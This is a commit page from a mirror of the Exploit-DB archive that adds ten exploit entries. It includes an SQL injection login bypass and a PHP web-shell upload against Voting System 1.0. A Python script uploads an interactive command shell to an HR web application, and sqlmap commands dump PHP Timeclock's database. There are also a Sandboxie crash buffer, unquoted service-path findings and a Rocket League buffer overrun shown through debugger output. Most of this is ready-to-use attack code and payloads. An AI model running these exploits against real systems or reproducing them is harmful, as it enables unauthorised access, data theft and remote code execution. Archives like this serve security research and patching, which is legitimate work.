bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2021-05-08

Browse source 
10 changes to exploits/shellcodes

Sandboxie 5.49.7 - Denial of Service (PoC)
Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
Epic Games Rocket League 1.95 - Stack Buffer Overrun

Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
Voting System 1.0 - Authentication Bypass (SQLI)
Voting System 1.0 - Remote Code Execution (Unauthenticated)
Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021
This commit is contained in:
Offensive Security 2021-05-08 05:01:52 +00:00
parent 72135d9121
commit e4f4680368
11 changed files with 801 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

60
exploits/php/webapps/49843.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI)
# Date: 06/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB
You can simply bypass the /admin/login.php with the following sql injection.
All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing
########################### Vulnerable code ############################
if(isset($_POST['login'])){
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT * FROM admin WHERE username = '$username'";
$query = $conn->query($sql);
if($query->num_rows < 1){
$_SESSION['error'] = 'Cannot find account with the username';
}
else{
$row = $query->fetch_assoc();
echo "DB Password: " . $row['password'];
echo "<br>";
echo "<br>";
echo "Input Password: " . $password;
if(password_verify($password, $row['password'])){
echo "Equal";
$_SESSION['admin'] = $row['id'];
}
else{
echo "not Equal";
$_SESSION['error'] = 'Incorrect password';
}
}
}
else{
$_SESSION['error'] = 'Input admin credentials first';
}
########################### Payload ############################
POST /admin/login.php HTTP/1.1
Host: 192.168.1.1
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -

67
exploits/php/webapps/49846.txt Normal file
View file

@ -0,0 +1,67 @@
# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 07/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB
Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE.
Your upload will be stored at /images/ and is also accessible without authentication.
########################### Vulnerable code ############################
<?php
include 'includes/session.php';
if(isset($_POST['add'])){
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$position = $_POST['position'];
$platform = $_POST['platform'];
$filename = $_FILES['photo']['name'];
if(!empty($filename)){
move_uploaded_file($_FILES['photo']['tmp_name'], '../images/'.$filename);
}
$sql = "INSERT INTO candidates (position_id, firstname, lastname, photo, platform) VALUES ('$position', '$firstname', '$lastname', '$filename', '$platform')";
if($conn->query($sql)){
$_SESSION['success'] = 'Candidate added successfully';
}
else{
$_SESSION['error'] = $conn->error;
}
}
else{
$_SESSION['error'] = 'Fill up add form first';
}
header('location: candidates.php');
?>
########################### Payload ############################
POST /admin/candidates_add.php HTTP/1.1
Host: 192.168.1.1
Content-Length: 275
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo exec("whoami"); ?>
------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add"

109
exploits/php/webapps/49847.py Executable file
View file

@ -0,0 +1,109 @@
# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
# Date: 04-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
# Version: 0.1
# Tested on: PHP 7.4.11 , Linux x64_x86
############################################################################################################
# Description:
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
############################################################################################################
# Proof of concept:
#!/usr/bin/python3
import requests
import sys
from bs4 import BeautifulSoup
def find_shell(domain):
req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
soup = BeautifulSoup(req_2.content , "html.parser")
imgs = soup.find_all("img")
for i in imgs:
src = i['src']
if ("shell.php" in src):
print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
break
else:
continue
def upload_file(domain):
print("\n [!] Uploading Shell . . .")
payload = """
<!DOCTYPE html>
<html>
<head>
<title> Shell </title>
</head>
<body>
<form action="#" method="post">
<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">
<br><br>
<input type="submit" name="submit" value="execute">
</form>
<?php
$cmd = $_POST['cmd'];
$result = shell_exec($cmd);
echo "<pre>{$result}</pre>";
?>
</body>
</html>
"""
h = {
"Content-Type" : "multipart/form-data"
}
f = {'employee_image':('shell.php',payload,
'application/x-php', {'Content-Disposition': 'form-data'}
)
}
d = {
"emplo" : "",
"employee_companyid" : "test",
"employee_firstname" : "test",
"employee_lastname" : "test",
"employee_middlename" : "test",
"branches_datefrom" : "0011-11-11",
"branches_recentdate" : "2222-11-11",
"employee_position" : "test",
"employee_contact" : "23123132132",
"employee_sss" : "test",
"employee_tin" : "test",
"employee_hdmf_pagibig" : "test",
"employee_gsis" : "test"
}
url = domain + "/Admin_Dashboard/process/addemployee_process.php"
req = requests.post(url , data=d , files = f)
if req.status_code == 200:
if ("Insert Successfully" in req.text):
print("\n [!] Shell uploaded succefully\n")
find_shell(domain)
else:
print("Exploit Failed 1")
def main():
if len(sys.argv) != 2:
print('[!] usage: %s <target url> ' % sys.argv[0])
print('[!] eg: %s http://vulndomain.com' % sys.argv[0])
sys.exit(-1)
print("<><><><><><><><><><><><><><><><><><><><><><><><>")
print("<> Human Resource Information System <>")
print("<> Shell Uploader <>")
print("<><><><><><><><><><><><><><><><><><><><><><><><>")
target_domain = sys.argv[1]
upload_file(target_domain)
if __name__ == "__main__":
main()

40
exploits/php/webapps/49849.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection
# Date: 03.05.2021
# Exploit Author: Tyler Butler
# Vendor Homepage: http://timeclock.sourceforge.net
# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
# Version: 1.04
# Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5
Description: PHP Timeclock is vulnerable to both Boolean and Time Based SQL Injection on login.php via the login_userid parameter. This PoC shows how SQLmap can be used to exploit this vulnerability to dump database contents
Boolean Based Payload: user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass
Time Based Payload: user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass
Steps to reproduce:
1. Run sqlmap against a instance of PHP Timeclock
2. Follow the instructions below for specific versions of MySQL
MySQL >= 5.0.12:
$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --dbms=MySQL --technique=TB --current-db
---
Parameter: login_userid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: login_userid=user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass
---
MySQL < 5: On versions using MySQL < 5, table names must be included as arguments as information_schema was not introduced into MySQL yet.
$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --technique=B -D timeclock -T employees, -C empfullname --dump --dbms=MySQL -v
---
Parameter: login_userid (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: login_userid=user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass
---

18
exploits/windows/dos/49844.py Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
# Date: 06/05/2021
# Author: Erick Galindo
# Vendor Homepage: https://sandboxie-plus.com/
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
# Version: 5.49.7
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Sandboxie Control->Sandbox->Set Container Folder
#3.- Paste the buffer in the input then press ok
buffer = "\x41" * 5000
f = open ("Sandboxie10.txt", "w")
f.write(buffer)
f.close()

56
exploits/windows/local/49841.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
# Date: 04.05.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.epicgames.com https://www.easy.ac
Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation
Vendor: Epic Games, Inc.
Product web page: https://www.epicgames.com
https://www.easy.ac
Affected version: 4.0.0.0
Summary: Easy Anti-Cheat is the industry-leading anticheat service,
countering hacking and cheating in multiplayer PC games through the
use of hybrid anticheat mechanisms.
Desc: The application suffers from an unquoted search path issue impacting
the service 'EasyAntiCheat' for Windows deployed as part of Easy Anti-Cheat
Service application. This could potentially allow an authorized but non-privileged
local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5652
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5652.php
04.05.2021
--
C:\Users>sc qc EasyAntiCheat
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EasyAntiCheat
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : EasyAntiCheat
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

32
exploits/windows/local/49842.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-06
# Vendor Homepage: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Plus-x64-v0.7.4.exe
# Tested Version: 0.7.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Sandboxie Service" | findstr /i /v """
Sandboxie Service SbieSvc C:\Program Files\Sandboxie-Plus\SbieSvc.exe Auto
# Service info
sc qc "SbieSvc"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SbieSvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Sandboxie-Plus\SbieSvc.exe
GRUPO_ORDEN_CARGA : UIGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Sandboxie Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

30
exploits/windows/local/49845.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-06
# Vendor Homepage: https://www.gearboxcomputers.com/downloads/wifihotspot.exe
# Tested Version: 1.0.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
MainService WifiHotSpotSvc C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe Auto
# Service info
sc qc wifihotspotsvc
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: wifihotspotsvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : MainService
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

378
exploits/windows/local/49848.txt Normal file
View file

@ -0,0 +1,378 @@
# Exploit Title: Epic Games Rocket League 1.95 - Stack Buffer Overrun
# Date: 25.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.epicgames.com https://www.rocketleague.com
Epic Games Rocket League 1.95 (AK::MemoryMgr::GetPoolName) Stack Buffer Overrun
Vendor: Epic Games Inc. | Psyonix, LLC
Product web page: https://www.epicgames.com
https://www.psyonix.com
https://www.rocketleague.com
Affected version: <=1.95
Summary: Rocket League is a high-powered hybrid of arcade-style soccer
and vehicular mayhem with easy-to-understand controls and fluid, physics-driven
competition.
Desc: The game suffers from a stack-based buffer overflow vulnerability. The
issue is caused due to a boundary error in the processing of a UPK format file,
which can be exploited to cause a stack buffer overflow when a user crafts the
file with a large array of bytes inserted in the vicinity offset after the magic
header. Successful exploitation could allow execution of arbitrary code on the
affected machine.
Tested on: Microsoft Windows 10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5651
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5651.php
25.04.2021
--
Craft location: ..\rocketleague\TAGame\CookedPCConsole
Header: C1 83 2A 9E 64 03 1F 00
hat_Headphones_SF.upk:
----------------------
...
...
ModLoad: 00007ff9`99ff0000 00007ff9`9a016000 C:\WINDOWS\system32\ncryptsslp.dll
ModLoad: 00007ff9`32d70000 00007ff9`36a00000 C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_e9f7884f9b4f82b9\igd9dxva64.dll
ModLoad: 00007ff9`315b0000 00007ff9`32d68000 C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvd3dumx.dll
ModLoad: 00000000`00400000 00000000`0041e000 E:\Epic Games\rocketleague\Binaries\Win64\XINPUT1_3.dll
ModLoad: 00007ff9`8dac0000 00007ff9`8db6c000 C:\WINDOWS\SYSTEM32\TextShaping.dll
[0110.33] Log: Timed out while waiting for GPU to catch up. (500 ms)
(62c.1074): Unknown exception - code 00000001 (!!! second chance !!!)
KERNELBASE!RaiseException+0x69:
00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax]
0:024> r
rax=00007ff99feeb925 rbx=0000000000000000 rcx=0000000000000000
rdx=000000214edfe8b0 rsi=000000214edfef50 rdi=000000214edfe700
rip=00007ff9a0364b59 rsp=000000214edfef30 rbp=0000000000000000
r8=000000214edfedb0 r9=0000000000000000 r10=00000000000000c0
r11=000000214edfee2e r12=0000000000000000 r13=00007ff776205bb0
r14=00007ff776dab710 r15=000000214edff8a0
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000204
KERNELBASE!RaiseException+0x69:
00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax]
0:024> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Epic Games\rocketleague\Binaries\Win64\EOSSDK-Win64-Shipping.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvwgf2umx.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Epic Games\Launcher\Portal\Extras\Overlay\EOSOVH-Win64-Shipping.dll -
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
KERNELBASE!RaiseException+69
00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffed4d64b59 (KERNELBASE!RaiseException+0x0000000000000069)
ExceptionCode: 00000001
ExceptionFlags: 00000000
NumberParameters: 0
FAULTING_THREAD: 00000490
DEFAULT_BUCKET_ID: APPLICATION_FAULT
PROCESS_NAME: RocketLeague.exe
ERROR_CODE: (NTSTATUS) 0x1 - STATUS_WAIT_1
EXCEPTION_CODE: (Win32) 0x1 (1) - Incorrect function.
EXCEPTION_CODE_STR: 1
WATSON_BKT_PROCSTAMP: 606f6afa
WATSON_BKT_PROCVER: 1.0.10897.0
PROCESS_VER_PRODUCT: Rocket League
WATSON_BKT_MODULE: KERNELBASE.dll
WATSON_BKT_MODSTAMP: 2f2f77bf
WATSON_BKT_MODOFFSET: 34b59
WATSON_BKT_MODVER: 10.0.19041.906
MODULE_VER_PRODUCT: Microsoft® Windows® Operating System
BUILD_VERSION_STRING: 10.0.19041.928 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: ac197712fdc57f2bb67f9b17107e5701c93b4362
MODLIST_SHA1_HASH: 342698e051c108fd7be71346f5d34f8a14c38381
NTGLOBALFLAG: 0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: LAB17
ANALYSIS_SESSION_TIME: 04-25-2021 13:23:34.0003
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n308]
Type: [APPLICATION_FAULT]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [Unspecified]
Frame: [0]
BUGCHECK_STR: APPLICATION_FAULT
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 00007ff78f1cbf65 to 00007ffed4d64b59
STACK_TEXT:
00000089`23dfe910 00007ff7`8f1cbf65 : 00007ff7`9123b710 00000000`000002f8 00007ff7`906e5190 00000089`23dfea20 : KERNELBASE!RaiseException+0x69
00000089`23dfe9f0 00007ff7`8f190215 : 00000089`23dff710 00000089`23dff5d0 00000089`23dff710 00007ffe`d72ee25f : RocketLeague!GetOutermost+0x29245
00000089`23dff250 00007ff7`8f123466 : 00000089`23dff710 00007ff7`906eb668 00000199`6cf33e40 00000089`23dfe828 : RocketLeague!AK::MusicEngine::Term+0xfce95
00000089`23dff4d0 00007ff7`8f1297f9 : 0000019a`00000001 00000000`00000000 00000089`23dff770 00000199`00000001 : RocketLeague!AK::MusicEngine::Term+0x900e6
00000089`23dff6d0 00007ff7`8f1d1e40 : 00000000`00000001 00000000`00000001 0000019a`00000000 00000199`6d26ffd0 : RocketLeague!AK::MusicEngine::Term+0x96479
00000089`23dff850 00007ffe`d6297034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!Scaleform::System::Init+0x11c0
00000089`23dff880 00007ffe`d7302651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000089`23dff8b0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: b03d2da27c20caaf2a76cdae45ff251160c76115
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: ff5c11b082c48239ef2666814fc4e06663a8c892
THREAD_SHA1_HASH_MOD: 96a23e97d7538141fe1b904de60919531df8b505
FOLLOWUP_IP:
RocketLeague!GetOutermost+29245
00007ff7`8f1cbf65 eb13 jmp RocketLeague!GetOutermost+0x2925a (00007ff7`8f1cbf7a)
FAULT_INSTR_CODE: 8b4813eb
SYMBOL_STACK_INDEX: 1
SYMBOL_NAME: rocketleague!GetOutermost+29245
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: RocketLeague
IMAGE_NAME: RocketLeague.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 606f6afa
STACK_COMMAND: ~24s ; .cxr ; kb
FAILURE_BUCKET_ID: APPLICATION_FAULT_1_RocketLeague.exe!GetOutermost
BUCKET_ID: APPLICATION_FAULT_rocketleague!GetOutermost+29245
FAILURE_EXCEPTION_CODE: 1
FAILURE_IMAGE_NAME: RocketLeague.exe
BUCKET_ID_IMAGE_STR: RocketLeague.exe
FAILURE_MODULE_NAME: RocketLeague
BUCKET_ID_MODULE_STR: RocketLeague
FAILURE_FUNCTION_NAME: GetOutermost
BUCKET_ID_FUNCTION_STR: GetOutermost
BUCKET_ID_OFFSET: 29245
BUCKET_ID_MODTIMEDATESTAMP: 606f6afa
BUCKET_ID_MODCHECKSUM: 251425f
BUCKET_ID_MODVER_STR: 1.0.10897.0
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: RocketLeague.exe!GetOutermost
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/RocketLeague.exe/1.0.10897.0/606f6afa/KERNELBASE.dll/10.0.19041.906/2f2f77bf/1/00034b59.htm?Retriage=1
TARGET_TIME: 2021-04-25T11:23:44.000Z
OSBUILD: 19042
OSSERVICEPACK: 928
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: 2022-01-18 11:29:28
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.19041.928
ANALYSIS_SESSION_ELAPSED_TIME: 795d
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:application_fault_1_rocketleague.exe!getoutermost
FAILURE_ID_HASH: {ee1c73f7-ce6b-9e4a-8e1b-66937ecee43c}
Followup: MachineOwner
...
...
(aa0.3818): Unknown exception - code 00000001 (first chance)
(aa0.3818): Unknown exception - code 00000001 (!!! second chance !!!)
KERNELBASE!RaiseException+0x69:
00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax]
0:024> g
[0188.65] Warning: Warning, Detected data corruption [header] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook.
[0188.65] Critical: appError called: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'
[0188.65] Critical: Windows GetLastError: The operation completed successfully. (0)
[0188.65] Warning: Warning, Detected data corruption [undershoot] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook.
[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'
[0188.65] Warning: Warning, Detected data corruption [incorrect uncompressed size] calculated 1094795585 bytes, requested 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook.
[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'
[0188.66] DevBeacon: FWebSocket::ReadCloseReason this=000002B686633200 received opcode CLOSE. Code=1000 Reason=IdleTimeout
[0188.66] DevOnline: EOSSDK-LogEOS: Large tick time detected 22.5409
hat_peanut_SF.upk:
------------------
...
...
0:077> g
(3568.230c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
VCRUNTIME140!memcmp+0xee:
00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi]
0:000> r
rax=0000009852afeaf8 rbx=000001a1cc362268 rcx=ffffffff9c71eae4
rdx=0000010951ea4107 rsi=000001a1a49a4107 rdi=0000009852b00000
rip=00007ffeafc812de rsp=0000009852afe9c8 rbp=ffffffff9c71ffec
r8=ffffffff9c71ffec r9=00000000000000ff r10=000001a1a49a2bff
r11=0000009852afeaf8 r12=0000000000000000 r13=0000000000000000
r14=0000009852afeaf8 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
VCRUNTIME140!memcmp+0xee:
00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi]
0:000> g
(3568.230c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
RocketLeague!AK::MemoryMgr::GetPoolName+0x84164:
00007ff6`4a660424 cd29 int 29h
0:000> .exr -1
ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
0:000> u 00007ff64a660424
RocketLeague!AK::MemoryMgr::GetPoolName+0x84164:
00007ff6`4a660424 cd29 int 29h
00007ff6`4a660426 488d0d3303f600 lea rcx,[RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d678 (00007ff6`4b5c0760)]
00007ff6`4a66042d e8ca010000 call RocketLeague!AK::MemoryMgr::GetPoolName+0x8433c (00007ff6`4a6605fc)
00007ff6`4a660432 488b442438 mov rax,qword ptr [rsp+38h]
00007ff6`4a660437 4889051a04f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d770 (00007ff6`4b5c0858)],rax
00007ff6`4a66043e 488d442438 lea rax,[rsp+38h]
00007ff6`4a660443 4883c008 add rax,8
00007ff6`4a660447 488905aa03f600 mov qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d710 (00007ff6`4b5c07f8)],rax
0:000> kb 10
# RetAddr : Args to Child : Call Site
00 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164
01 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f
02 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf
03 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244
